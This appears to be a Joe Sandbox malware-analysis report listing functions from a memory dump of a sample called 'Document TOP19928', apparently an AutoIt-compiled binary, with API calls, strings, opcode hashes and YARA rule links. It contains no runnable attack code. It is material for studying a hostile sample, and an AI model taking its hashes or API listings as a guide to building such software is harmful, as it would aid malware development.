Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,007D1AEE,?,?,?), ref: 007D16AB

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: e8ae3c419d661c42e08e177119b1beab45e23dbe5d8a51860ced157911275070
Instruction ID: 4c84e7637f34c57b208c83c7b3be95bf91e65c178f39f396cc33ffd4ffa215d6
Opcode Fuzzy Hash: e8ae3c419d661c42e08e177119b1beab45e23dbe5d8a51860ced157911275070
Instruction Fuzzy Hash: 8CE0EC35200208FBCF06AF90DC15E643B26FB58354F148429FA555A2A2DA36A522DB50

Function 0085CB50 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL ref: 0085CB75

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 4868b7d2f2150f285712b4a7107c8674984904398a4c0a1a772a8bf4142eb6bc
Instruction ID: d3e59769ba1cf30cad506cd3808ed30bd8ad31c2468011ffa48d9ac8cdb9ba6c
Opcode Fuzzy Hash: 4868b7d2f2150f285712b4a7107c8674984904398a4c0a1a772a8bf4142eb6bc
Instruction Fuzzy Hash: EBE0E235204208AFCB01EF88D884E863BA5BB1D300F014064FA1557262CB71A830EB61

Function 0085CB7F Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL ref: 0085CBA4

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 3b3d2414eb9e2bcc6bedb4208c1ce0a350ad1b104a2063a995540550df42023e
Instruction ID: 480b6eac219eb92b5c2b8c2059abaaa37c6772b604323dc34fc5c8f751d46285
Opcode Fuzzy Hash: 3b3d2414eb9e2bcc6bedb4208c1ce0a350ad1b104a2063a995540550df42023e
Instruction Fuzzy Hash: 46E0E235200208EFCB01EF88D844D863BA5BB1D300F014064FA1547262CB71A830EBA1

Function 007D16B5 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

Part of subcall function 007D201B: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007D20D3
Part of subcall function 007D201B: KillTimer.USER32(-00000001,?,?,?,?,007D16CB,00000000,?,?,007D1AE2,?,?), ref: 007D216E

NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,007D1AE2,?,?), ref: 007D16D4

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Window$DestroyDialogKillLongNtdllProc_Timer
String ID:
API String ID: 2797419724-0
Opcode ID: 2c48f34bff65008b3e4011eb61e07a7516c3c3d2deed8c54a9c72fa36edfd4ee
Instruction ID: 1c09b4ec6c603f62f4d31bf7789c37de4f7d99388f1e7304457a8f1e89828948
Opcode Fuzzy Hash: 2c48f34bff65008b3e4011eb61e07a7516c3c3d2deed8c54a9c72fa36edfd4ee
Instruction Fuzzy Hash: 52D01230240308B7DE123FA1DC1BF593A29EB64750F508021BB04692D3DA75A822A568

Function 00812230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00812242

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: c998fa57cc9f1213a278280f5f06cd8c9c0739762f399c4f90cd42a747b092af
Instruction ID: 9b5f12aa9303d3e6366a8e3ea03e3399c5e57fc82bc60ee394837cb54feaa247
Opcode Fuzzy Hash: c998fa57cc9f1213a278280f5f06cd8c9c0739762f399c4f90cd42a747b092af
Instruction Fuzzy Hash: 33C04CF180510DDBDB05DB90D988DEE77BCBB04315F144055A201F2141D7749B448A71

Function 007FA364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 007FA36A

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f47299b513b44a0a9ddd7bdce32cc53438561f8b9ab8e18be5c822f4db8ccd8a
Instruction ID: c0e7cc62d71eb6d461770b464d8e9543eee92babb0937b3015ac005303dd6027
Opcode Fuzzy Hash: f47299b513b44a0a9ddd7bdce32cc53438561f8b9ab8e18be5c822f4db8ccd8a
Instruction Fuzzy Hash: 19A0113000020CAB8A002F82EC08888BFAEEA002A2B008020FA0C802328B32A8208A80

Function 007E8A0E Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bfa50e64f4b64d32d224b93f8d948bc41cdf0a6b0cb53c453c79bc544b93b86
Instruction ID: 7cf8b0fe2951ab047055fce953ff785f50b84a7b5fae7fcfb3740bb186dc011a
Opcode Fuzzy Hash: 5bfa50e64f4b64d32d224b93f8d948bc41cdf0a6b0cb53c453c79bc544b93b86
Instruction Fuzzy Hash: 352249705026A5CBCF688B19D48467D77B1FB0A304F3584AAD84ADB2A1DB38DDC1CB72

Function 007F2405 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 46bcb3ba7d34cc867170d2eb515b74c288e7e86f20fadd8ca7bded97b730cb64
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 24C1C6322060974ADF2D463AD43403EFAE15EA27B135A0B5DE5B3CB6C5FF28D625D620

Function 007F283A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 77538f077be4be7565b67c1ed2ec2f6151542100c6eed09a5b36c2ca0d291cc9
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 65C1E83220609749DF2D463AC43403EBBE15F927B135A0B5DE9B3DB2C5EF18D625D620

Function 007F1BB8 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: ff6b215db03d7da893a35ea8059e8b9d88c793f5c270c212727176a099349454
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: A7C1EE3221615789DF2D463AC43403EFBE15EA27B179A0B5DE5B3CB6C4EF18D624D620

Function 00847B1B Relevance: 75.7, APIs: 39, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00847B70
DeleteObject.GDI32(00000000), ref: 00847B82
DestroyWindow.USER32 ref: 00847B90
GetDesktopWindow.USER32 ref: 00847BAA
GetWindowRect.USER32(00000000), ref: 00847BB1
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00847CF2
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00847D02
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847D4A
GetClientRect.USER32(00000000,?), ref: 00847D56
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00847D90
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847DB2
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847DC5
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847DD0
GlobalFix.KERNEL32(00000000), ref: 00847DD9
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847DE8
GlobalUnWire.KERNEL32(00000000), ref: 00847DF1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847DF8
GlobalFree.KERNEL32(00000000), ref: 00847E03
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00862CAC,00000000), ref: 00847E2B
GlobalFree.KERNEL32(00000000), ref: 00847E3B
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00847E61
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00847E80
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847EA2
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0084808F

Strings

, xrefs: 00848015
AutoIt v3, xrefs: 00847D42
DISPLAY, xrefs: 00847EF2
static, xrefs: 00847D8A, 00847EE1

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Window$Global$Rect$CreateFile$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadMessagePictureReadSendShowSizeWire
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2547915802-2373415609
Opcode ID: 291f43992b5c737f68f91bc16eed3ea87f294060085d1f1e1f9fb01f5025a31e
Instruction ID: f786fdbb5e03db7da8f7cc793e71733d30aa96f8fc41e7c8ab1e312ee84cf928
Opcode Fuzzy Hash: 291f43992b5c737f68f91bc16eed3ea87f294060085d1f1e1f9fb01f5025a31e
Instruction Fuzzy Hash: DA026B71900209EFDB14DFA4CC89EAE7BB9FB48311F148159FA15EB2A1DB74AD01CB60

Function 008537F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0085F910), ref: 008538AF
IsWindowVisible.USER32(?), ref: 008538D3

Strings

SETCURRENTSELECTION, xrefs: 00853A3E
EDITPASTE, xrefs: 00853BE7
DELSTRING, xrefs: 008539D1
ISCHECKED, xrefs: 00853AC1
FINDSTRING, xrefs: 008539FE
SHOWDROPDOWN, xrefs: 00853968
CHECK, xrefs: 00853AF5
CURRENTTAB, xrefs: 00853945
GETSELECTED, xrefs: 00853B2B
HIDEDROPDOWN, xrefs: 00853988
ADDSTRING, xrefs: 0085399E
GETLINE, xrefs: 00853C23
UNCHECK, xrefs: 00853B0B
ISVISIBLE, xrefs: 008538BF
GETCURRENTCOL, xrefs: 00853BB0
GETCURRENTSELECTION, xrefs: 00853A6B
GETLINECOUNT, xrefs: 00853B4E
ISENABLED, xrefs: 008538F3
TABLEFT, xrefs: 0085390F
SELECTSTRING, xrefs: 00853A8E
GETCURRENTLINE, xrefs: 00853B75
TABRIGHT, xrefs: 00853925
SENDCOMMANDID, xrefs: 00853C62

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 3b540d6434b277fc7683248994f914abcced09f8badce2e35f82f2dbde7ad97f
Instruction ID: 5cf49d0168ce2882ce8bd174f34d875af2eec35902678ec1f387dd49ab7a4bcf
Opcode Fuzzy Hash: 3b540d6434b277fc7683248994f914abcced09f8badce2e35f82f2dbde7ad97f
Instruction Fuzzy Hash: BBD18030204319DBCB14EF64C455A6ABBA5FF95395F004458BD86DB3A3CB25EE4ECB82

Function 0085A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0085A89F
GetSysColorBrush.USER32(0000000F), ref: 0085A8D0
GetSysColor.USER32(0000000F), ref: 0085A8DC
SetBkColor.GDI32(?,000000FF), ref: 0085A8F6
SelectObject.GDI32(?,?), ref: 0085A905
InflateRect.USER32(?,000000FF,000000FF), ref: 0085A930
GetSysColor.USER32(00000010), ref: 0085A938
CreateSolidBrush.GDI32(00000000), ref: 0085A93F
FrameRect.USER32(?,?,00000000), ref: 0085A94E
DeleteObject.GDI32(00000000), ref: 0085A955
InflateRect.USER32(?,000000FE,000000FE), ref: 0085A9A0
FillRect.USER32(?,?,?), ref: 0085A9D2
GetWindowLongW.USER32(?,000000F0), ref: 0085A9FD

Part of subcall function 0085AB60: GetSysColor.USER32(00000012), ref: 0085AB99
Part of subcall function 0085AB60: SetTextColor.GDI32(?,?), ref: 0085AB9D
Part of subcall function 0085AB60: GetSysColorBrush.USER32(0000000F), ref: 0085ABB3
Part of subcall function 0085AB60: GetSysColor.USER32(0000000F), ref: 0085ABBE
Part of subcall function 0085AB60: GetSysColor.USER32(00000011), ref: 0085ABDB
Part of subcall function 0085AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0085ABE9
Part of subcall function 0085AB60: SelectObject.GDI32(?,00000000), ref: 0085ABFA
Part of subcall function 0085AB60: SetBkColor.GDI32(?,00000000), ref: 0085AC03
Part of subcall function 0085AB60: SelectObject.GDI32(?,?), ref: 0085AC10
Part of subcall function 0085AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0085AC2F
Part of subcall function 0085AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0085AC46
Part of subcall function 0085AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0085AC5B

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 04e2521ce712e3f2434ead302eea6867fa98f4afc31391d75ed78f5aafb8d02e
Instruction ID: 04972c9de144740cf65ecd5d4b0ed9732b457e4996b0e12149003ddf4afb489d
Opcode Fuzzy Hash: 04e2521ce712e3f2434ead302eea6867fa98f4afc31391d75ed78f5aafb8d02e
Instruction Fuzzy Hash: 52A18072008315EFDB159F64DC48A6B7BA9FF88322F104B29FA62D61E1D735D844CB52

Function 008477BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 008477F1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 008478B0
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 008478EE
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00847900
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00847946
GetClientRect.USER32(00000000,?), ref: 00847952
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00847996
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 008479A5
GetStockObject.GDI32(00000011), ref: 008479B5
SelectObject.GDI32(00000000,00000000), ref: 008479B9
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 008479C9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 008479D2
DeleteDC.GDI32(00000000), ref: 008479DB
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00847A07
SendMessageW.USER32(00000030,00000000,00000001), ref: 00847A1E
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00847A59
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00847A6D
SendMessageW.USER32(00000404,00000001,00000000), ref: 00847A7E
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00847AAE
GetStockObject.GDI32(00000011), ref: 00847AB9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00847AC4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00847ACE

Strings

AutoIt v3, xrefs: 0084793E
DISPLAY, xrefs: 0084799B
static, xrefs: 00847990, 00847AA8
msctls_progress32, xrefs: 00847A4F

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

